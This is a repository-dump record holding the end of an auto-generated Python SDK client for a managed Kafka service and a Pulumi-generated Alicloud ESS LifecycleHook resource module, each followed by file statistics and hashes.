collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] if 'task_id' in local_var_params: path_params['task_id'] = local_var_params['task_id'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks/{task_id}', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowSinkTaskDetailResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def show_topic_access_policy_async(self, request): """查询用户权限 查询用户权限。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param ShowTopicAccessPolicyRequest request :return: ShowTopicAccessPolicyResponse """ return self.show_topic_access_policy_with_http_info(request) def show_topic_access_policy_with_http_info(self, request): """查询用户权限 查询用户权限。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param ShowTopicAccessPolicyRequest request :return: ShowTopicAccessPolicyResponse """ all_params = ['instance_id', 'topic_name'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic_name' in local_var_params: path_params['topic_name'] = local_var_params['topic_name'] query_params = [] header_params = {} form_params = {} body_params = None if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] 
header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v1/{project_id}/instances/{instance_id}/topics/{topic_name}/accesspolicy', method='GET', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='ShowTopicAccessPolicyResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_instance_async(self, request): """修改实例信息 修改实例的名称和描述信息。 :param UpdateInstanceRequest request :return: UpdateInstanceResponse """ return self.update_instance_with_http_info(request) def update_instance_with_http_info(self, request): """修改实例信息 修改实例的名称和描述信息。 :param UpdateInstanceRequest request :return: UpdateInstanceResponse """ all_params = ['instance_id', 'update_instance_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateInstanceResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, 
request_type=request.__class__.__name__) def update_instance_auto_create_topic_async(self, request): """开启或关闭实例自动创建topic功能 开启或关闭实例自动创建topic功能。 :param UpdateInstanceAutoCreateTopicRequest request :return: UpdateInstanceAutoCreateTopicResponse """ return self.update_instance_auto_create_topic_with_http_info(request) def update_instance_auto_create_topic_with_http_info(self, request): """开启或关闭实例自动创建topic功能 开启或关闭实例自动创建topic功能。 :param UpdateInstanceAutoCreateTopicRequest request :return: UpdateInstanceAutoCreateTopicResponse """ all_params = ['instance_id', 'update_instance_auto_create_topic_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/autotopic', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateInstanceAutoCreateTopicResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_instance_cross_vpc_ip_async(self, request): """修改实例跨VPC访问的内网IP 修改实例跨VPC访问的内网IP。 :param UpdateInstanceCrossVpcIpRequest request :return: UpdateInstanceCrossVpcIpResponse """ return self.update_instance_cross_vpc_ip_with_http_info(request) def update_instance_cross_vpc_ip_with_http_info(self, request): 
"""修改实例跨VPC访问的内网IP 修改实例跨VPC访问的内网IP。 :param UpdateInstanceCrossVpcIpRequest request :return: UpdateInstanceCrossVpcIpResponse """ all_params = ['instance_id', 'update_instance_cross_vpc_ip_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/crossvpc/modify', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateInstanceCrossVpcIpResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_instance_topic_async(self, request): """修改Kafka实例Topic 修改Kafka实例Topic :param UpdateInstanceTopicRequest request :return: UpdateInstanceTopicResponse """ return self.update_instance_topic_with_http_info(request) def update_instance_topic_with_http_info(self, request): """修改Kafka实例Topic 修改Kafka实例Topic :param UpdateInstanceTopicRequest request :return: UpdateInstanceTopicResponse """ all_params = ['instance_id', 'update_instance_topic_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = 
local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/topics', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateInstanceTopicResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_sink_task_quota_async(self, request): """修改转储任务的配额 修改转储任务的配额。 :param UpdateSinkTaskQuotaRequest request :return: UpdateSinkTaskQuotaResponse """ return self.update_sink_task_quota_with_http_info(request) def update_sink_task_quota_with_http_info(self, request): """修改转储任务的配额 修改转储任务的配额。 :param UpdateSinkTaskQuotaRequest request :return: UpdateSinkTaskQuotaResponse """ all_params = ['connector_id', 'update_sink_task_quota_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'connector_id' in local_var_params: path_params['connector_id'] = local_var_params['connector_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( 
resource_path='/v2/{project_id}/connectors/{connector_id}/sink-tasks', method='PUT', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateSinkTaskQuotaResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def update_topic_access_policy_async(self, request): """设置用户权限 设置用户权限。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param UpdateTopicAccessPolicyRequest request :return: UpdateTopicAccessPolicyResponse """ return self.update_topic_access_policy_with_http_info(request) def update_topic_access_policy_with_http_info(self, request): """设置用户权限 设置用户权限。 Kafka实例开启SASL功能时,才支持多用户管理的功能。 :param UpdateTopicAccessPolicyRequest request :return: UpdateTopicAccessPolicyResponse """ all_params = ['instance_id', 'update_topic_access_policy_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v1/{project_id}/instances/{instance_id}/topics/accesspolicy', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateTopicAccessPolicyResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, 
request_type=request.__class__.__name__) def update_topic_replica_async(self, request): """修改Kafka实例Topic分区的副本 修改Kafka实例Topic分区的副本。 :param UpdateTopicReplicaRequest request :return: UpdateTopicReplicaResponse """ return self.update_topic_replica_with_http_info(request) def update_topic_replica_with_http_info(self, request): """修改Kafka实例Topic分区的副本 修改Kafka实例Topic分区的副本。 :param UpdateTopicReplicaRequest request :return: UpdateTopicReplicaResponse """ all_params = ['instance_id', 'topic', 'update_topic_replica_request_body'] local_var_params = {} for attr in request.attribute_map: if hasattr(request, attr): local_var_params[attr] = getattr(request, attr) collection_formats = {} path_params = {} if 'instance_id' in local_var_params: path_params['instance_id'] = local_var_params['instance_id'] if 'topic' in local_var_params: path_params['topic'] = local_var_params['topic'] query_params = [] header_params = {} form_params = {} body_params = None if 'body' in local_var_params: body_params = local_var_params['body'] if isinstance(request, SdkStreamRequest): body_params = request.get_file_stream() response_headers = [] header_params['Content-Type'] = http_utils.select_header_content_type( ['application/json']) auth_settings = ['apig-auth-iam'] return self.call_api( resource_path='/v2/{project_id}/instances/{instance_id}/management/topics/{topic}/replicas-reassignment', method='POST', path_params=path_params, query_params=query_params, header_params=header_params, body=body_params, post_params=form_params, response_type='UpdateTopicReplicaResponse', response_headers=response_headers, auth_settings=auth_settings, collection_formats=collection_formats, request_type=request.__class__.__name__) def call_api(self, resource_path, method, path_params=None, query_params=None, header_params=None, body=None, post_params=None, response_type=None, response_headers=None, auth_settings=None, collection_formats=None, request_type=None): """Makes the HTTP request and returns deserialized 
data. :param resource_path: Path to method endpoint. :param method: Method to call. :param path_params: Path parameters in the url. :param query_params: Query parameters in the url. :param header_params: Header parameters to be placed in the request header. :param body: Request body. :param post_params dict: Request post form parameters, for `application/x-www-form-urlencoded`, `multipart/form-data`. :param auth_settings list: Auth Settings names for the request. :param response_type: Response data type. :param response_headers: Header should be added to response data. :param collection_formats: dict of collection formats for path, query, header, and post parameters. :param request_type: Request data type. :return: Return the response directly. """ return self.do_http_request( method=method, resource_path=resource_path, path_params=path_params, query_params=query_params, header_params=header_params, body=body, post_params=post_params, response_type=response_type, response_headers=response_headers, collection_formats=collection_formats, request_type=request_type, async_request=True)
31.278557
410
0.63364
10,748
109,256
6.032936
0.042799
0.041701
0.072977
0.02887
0.91598
0.900928
0.87505
0.847259
0.829894
0.699577
0
0.001259
0.280204
109,256
3,492
411
31.287514
0.823262
0.123636
0
0.825325
0
0.001001
0.121947
0.05455
0
0
0
0
0
1
0.053554
false
0.008509
0.005005
0
0.113614
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
d2b05392d80b7fabf34bae9a3f799560c2f98f4c
23,788
py
Python
sdk/python/pulumi_alicloud/ess/lifecycle_hook.py
pulumi/pulumi-alicloud
9c34d84b4588a7c885c6bec1f03b5016e5a41683
[ "ECL-2.0", "Apache-2.0" ]
42
2019-03-18T06:34:37.000Z
2022-03-24T07:08:57.000Z
sdk/python/pulumi_alicloud/ess/lifecycle_hook.py
pulumi/pulumi-alicloud
9c34d84b4588a7c885c6bec1f03b5016e5a41683
[ "ECL-2.0", "Apache-2.0" ]
152
2019-04-15T21:03:44.000Z
2022-03-29T18:00:57.000Z
sdk/python/pulumi_alicloud/ess/lifecycle_hook.py
pulumi/pulumi-alicloud
9c34d84b4588a7c885c6bec1f03b5016e5a41683
[ "ECL-2.0", "Apache-2.0" ]
3
2020-08-26T17:30:07.000Z
2021-07-05T01:37:45.000Z
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = ['LifecycleHookArgs', 'LifecycleHook'] @pulumi.input_type class LifecycleHookArgs: def __init__(__self__, *, lifecycle_transition: pulumi.Input[str], scaling_group_id: pulumi.Input[str], default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a LifecycleHook resource. :param pulumi.Input[str] lifecycle_transition: Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. :param pulumi.Input[str] scaling_group_id: The ID of the Auto Scaling group to which you want to assign the lifecycle hook. :param pulumi.Input[str] default_result: Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. :param pulumi.Input[int] heartbeat_timeout: Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. :param pulumi.Input[str] name: The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. :param pulumi.Input[str] notification_arn: The Arn of notification target. 
:param pulumi.Input[str] notification_metadata: Additional information that you want to include when Auto Scaling sends a message to the notification target. """ pulumi.set(__self__, "lifecycle_transition", lifecycle_transition) pulumi.set(__self__, "scaling_group_id", scaling_group_id) if default_result is not None: pulumi.set(__self__, "default_result", default_result) if heartbeat_timeout is not None: pulumi.set(__self__, "heartbeat_timeout", heartbeat_timeout) if name is not None: pulumi.set(__self__, "name", name) if notification_arn is not None: pulumi.set(__self__, "notification_arn", notification_arn) if notification_metadata is not None: pulumi.set(__self__, "notification_metadata", notification_metadata) @property @pulumi.getter(name="lifecycleTransition") def lifecycle_transition(self) -> pulumi.Input[str]: """ Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. """ return pulumi.get(self, "lifecycle_transition") @lifecycle_transition.setter def lifecycle_transition(self, value: pulumi.Input[str]): pulumi.set(self, "lifecycle_transition", value) @property @pulumi.getter(name="scalingGroupId") def scaling_group_id(self) -> pulumi.Input[str]: """ The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ return pulumi.get(self, "scaling_group_id") @scaling_group_id.setter def scaling_group_id(self, value: pulumi.Input[str]): pulumi.set(self, "scaling_group_id", value) @property @pulumi.getter(name="defaultResult") def default_result(self) -> Optional[pulumi.Input[str]]: """ Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. 
""" return pulumi.get(self, "default_result") @default_result.setter def default_result(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "default_result", value) @property @pulumi.getter(name="heartbeatTimeout") def heartbeat_timeout(self) -> Optional[pulumi.Input[int]]: """ Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. """ return pulumi.get(self, "heartbeat_timeout") @heartbeat_timeout.setter def heartbeat_timeout(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "heartbeat_timeout", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="notificationArn") def notification_arn(self) -> Optional[pulumi.Input[str]]: """ The Arn of notification target. """ return pulumi.get(self, "notification_arn") @notification_arn.setter def notification_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "notification_arn", value) @property @pulumi.getter(name="notificationMetadata") def notification_metadata(self) -> Optional[pulumi.Input[str]]: """ Additional information that you want to include when Auto Scaling sends a message to the notification target. 
""" return pulumi.get(self, "notification_metadata") @notification_metadata.setter def notification_metadata(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "notification_metadata", value) @pulumi.input_type class _LifecycleHookState: def __init__(__self__, *, default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, lifecycle_transition: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None, scaling_group_id: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering LifecycleHook resources. :param pulumi.Input[str] default_result: Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. :param pulumi.Input[int] heartbeat_timeout: Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. :param pulumi.Input[str] lifecycle_transition: Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. :param pulumi.Input[str] name: The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. :param pulumi.Input[str] notification_arn: The Arn of notification target. :param pulumi.Input[str] notification_metadata: Additional information that you want to include when Auto Scaling sends a message to the notification target. 
:param pulumi.Input[str] scaling_group_id: The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ if default_result is not None: pulumi.set(__self__, "default_result", default_result) if heartbeat_timeout is not None: pulumi.set(__self__, "heartbeat_timeout", heartbeat_timeout) if lifecycle_transition is not None: pulumi.set(__self__, "lifecycle_transition", lifecycle_transition) if name is not None: pulumi.set(__self__, "name", name) if notification_arn is not None: pulumi.set(__self__, "notification_arn", notification_arn) if notification_metadata is not None: pulumi.set(__self__, "notification_metadata", notification_metadata) if scaling_group_id is not None: pulumi.set(__self__, "scaling_group_id", scaling_group_id) @property @pulumi.getter(name="defaultResult") def default_result(self) -> Optional[pulumi.Input[str]]: """ Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. """ return pulumi.get(self, "default_result") @default_result.setter def default_result(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "default_result", value) @property @pulumi.getter(name="heartbeatTimeout") def heartbeat_timeout(self) -> Optional[pulumi.Input[int]]: """ Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. """ return pulumi.get(self, "heartbeat_timeout") @heartbeat_timeout.setter def heartbeat_timeout(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "heartbeat_timeout", value) @property @pulumi.getter(name="lifecycleTransition") def lifecycle_transition(self) -> Optional[pulumi.Input[str]]: """ Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. 
""" return pulumi.get(self, "lifecycle_transition") @lifecycle_transition.setter def lifecycle_transition(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "lifecycle_transition", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="notificationArn") def notification_arn(self) -> Optional[pulumi.Input[str]]: """ The Arn of notification target. """ return pulumi.get(self, "notification_arn") @notification_arn.setter def notification_arn(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "notification_arn", value) @property @pulumi.getter(name="notificationMetadata") def notification_metadata(self) -> Optional[pulumi.Input[str]]: """ Additional information that you want to include when Auto Scaling sends a message to the notification target. """ return pulumi.get(self, "notification_metadata") @notification_metadata.setter def notification_metadata(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "notification_metadata", value) @property @pulumi.getter(name="scalingGroupId") def scaling_group_id(self) -> Optional[pulumi.Input[str]]: """ The ID of the Auto Scaling group to which you want to assign the lifecycle hook. 
""" return pulumi.get(self, "scaling_group_id") @scaling_group_id.setter def scaling_group_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "scaling_group_id", value) class LifecycleHook(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, lifecycle_transition: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None, scaling_group_id: Optional[pulumi.Input[str]] = None, __props__=None): """ ## Import Ess lifecycle hook can be imported using the id, e.g. ```sh $ pulumi import alicloud:ess/lifecycleHook:LifecycleHook example ash-l12345 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] default_result: Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. :param pulumi.Input[int] heartbeat_timeout: Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. :param pulumi.Input[str] lifecycle_transition: Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. :param pulumi.Input[str] name: The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. 
:param pulumi.Input[str] notification_arn: The Arn of notification target. :param pulumi.Input[str] notification_metadata: Additional information that you want to include when Auto Scaling sends a message to the notification target. :param pulumi.Input[str] scaling_group_id: The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ ... @overload def __init__(__self__, resource_name: str, args: LifecycleHookArgs, opts: Optional[pulumi.ResourceOptions] = None): """ ## Import Ess lifecycle hook can be imported using the id, e.g. ```sh $ pulumi import alicloud:ess/lifecycleHook:LifecycleHook example ash-l12345 ``` :param str resource_name: The name of the resource. :param LifecycleHookArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(LifecycleHookArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, lifecycle_transition: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None, scaling_group_id: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ 
is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = LifecycleHookArgs.__new__(LifecycleHookArgs) __props__.__dict__["default_result"] = default_result __props__.__dict__["heartbeat_timeout"] = heartbeat_timeout if lifecycle_transition is None and not opts.urn: raise TypeError("Missing required property 'lifecycle_transition'") __props__.__dict__["lifecycle_transition"] = lifecycle_transition __props__.__dict__["name"] = name __props__.__dict__["notification_arn"] = notification_arn __props__.__dict__["notification_metadata"] = notification_metadata if scaling_group_id is None and not opts.urn: raise TypeError("Missing required property 'scaling_group_id'") __props__.__dict__["scaling_group_id"] = scaling_group_id super(LifecycleHook, __self__).__init__( 'alicloud:ess/lifecycleHook:LifecycleHook', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, default_result: Optional[pulumi.Input[str]] = None, heartbeat_timeout: Optional[pulumi.Input[int]] = None, lifecycle_transition: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, notification_arn: Optional[pulumi.Input[str]] = None, notification_metadata: Optional[pulumi.Input[str]] = None, scaling_group_id: Optional[pulumi.Input[str]] = None) -> 'LifecycleHook': """ Get an existing LifecycleHook resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] default_result: Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. 
:param pulumi.Input[int] heartbeat_timeout: Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. :param pulumi.Input[str] lifecycle_transition: Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. :param pulumi.Input[str] name: The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. :param pulumi.Input[str] notification_arn: The Arn of notification target. :param pulumi.Input[str] notification_metadata: Additional information that you want to include when Auto Scaling sends a message to the notification target. :param pulumi.Input[str] scaling_group_id: The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _LifecycleHookState.__new__(_LifecycleHookState) __props__.__dict__["default_result"] = default_result __props__.__dict__["heartbeat_timeout"] = heartbeat_timeout __props__.__dict__["lifecycle_transition"] = lifecycle_transition __props__.__dict__["name"] = name __props__.__dict__["notification_arn"] = notification_arn __props__.__dict__["notification_metadata"] = notification_metadata __props__.__dict__["scaling_group_id"] = scaling_group_id return LifecycleHook(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="defaultResult") def default_result(self) -> pulumi.Output[Optional[str]]: """ Defines the action the Auto Scaling group should take when the lifecycle hook timeout elapses. Applicable value: CONTINUE, ABANDON, default value: CONTINUE. 
""" return pulumi.get(self, "default_result") @property @pulumi.getter(name="heartbeatTimeout") def heartbeat_timeout(self) -> pulumi.Output[Optional[int]]: """ Defines the amount of time, in seconds, that can elapse before the lifecycle hook times out. When the lifecycle hook times out, Auto Scaling performs the action defined in the default_result parameter. Default value: 600. """ return pulumi.get(self, "heartbeat_timeout") @property @pulumi.getter(name="lifecycleTransition") def lifecycle_transition(self) -> pulumi.Output[str]: """ Type of Scaling activity attached to lifecycle hook. Supported value: SCALE_OUT, SCALE_IN. """ return pulumi.get(self, "lifecycle_transition") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name of the lifecycle hook, which must contain 2-64 characters (English or Chinese), starting with numbers, English letters or Chinese characters, and can contain number, underscores `_`, hypens `-`, and decimal point `.`. If this parameter value is not specified, the default value is lifecycle hook id. """ return pulumi.get(self, "name") @property @pulumi.getter(name="notificationArn") def notification_arn(self) -> pulumi.Output[str]: """ The Arn of notification target. """ return pulumi.get(self, "notification_arn") @property @pulumi.getter(name="notificationMetadata") def notification_metadata(self) -> pulumi.Output[str]: """ Additional information that you want to include when Auto Scaling sends a message to the notification target. """ return pulumi.get(self, "notification_metadata") @property @pulumi.getter(name="scalingGroupId") def scaling_group_id(self) -> pulumi.Output[str]: """ The ID of the Auto Scaling group to which you want to assign the lifecycle hook. """ return pulumi.get(self, "scaling_group_id")
53.576577
347
0.686312
2,862
23,788
5.508386
0.070929
0.066286
0.071043
0.066984
0.891468
0.878846
0.873708
0.862226
0.851633
0.824167
0
0.002875
0.225156
23,788
443
348
53.697517
0.852431
0.398899
0
0.751908
1
0
0.119592
0.01882
0
0
0
0
0
1
0.160305
false
0.003817
0.019084
0
0.274809
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
d2bcff7c0c3b8ff2bd06954889ab4ed80532302f
